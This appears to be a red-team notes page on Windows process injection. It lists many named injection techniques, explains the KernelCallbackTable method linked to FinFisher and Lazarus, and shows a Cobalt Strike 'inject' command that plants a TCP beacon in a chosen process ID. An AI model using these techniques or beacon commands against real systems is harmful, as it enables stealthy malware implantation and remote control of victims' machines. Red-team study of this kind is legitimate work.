Secondary Categories: 02 - Malware Links: Cobalt Strike
Description:
Its generally good to inject your shellcode into your own process memory region and if not then inject you shellcode into a process that will generate network traffic
KernelCallbackTable Method
Using this WinAPI function we can inject payloads into remote processes. This method is used by FinFisher/FinSpy and Lazarus in their malware campaigns.
To get this process injection method to work you can spawn a sacraficial process then inject into that.
Caro-Kann
Transacted Hollowing
Process Hollowing
Process Herpaderping
Process Ghosting
Process Doppelganging
Early Cascade
Pool Party
Early Bird
Remote Thread Hijacking
MockingJay
DirtyVanity
AddressOfEntryPoint
Asynchronous Procedure Calls
Reflective DLL Injection
SetWindowsHookEx
Atom Bombing
IAT Hooking
WriteProcessMemory
CreateRemoteThread
NtMapViewOfSection
PROPgate
TLS Callback
LoadLibrary
Function Stomping
Built In Cobalt Strike Methods
Process injection allows us to inject our shellcode into a process of our choosing. You can only inject into process that you can obtain a handle to with enough privileges to write to its memory.
shenjectallows you to inject shellcode from a binary file on your attacking machine.injectwill inject a full beacon payload for the specific listener
If we want to inject a TCP beacon payload into the a process we could do the following:
beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102^^^^ where tcp-local is the listener ^^^^
Again if the user closes the session then our connection will be lost.
Resources:
| Title | URL |
|---|---|
| Shellcode Loaders | https://frischkorn-nicholas.medium.com/windows-evasion-edrs-shellcode-loaders-e57db92de630 |
| KernelCallbackTable Capt. Meelo | https://captmeelo.com/redteam/maldev/2022/04/21/kernelcallbacktable-injection.html |
| modexp KernelCallback Table | https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/ |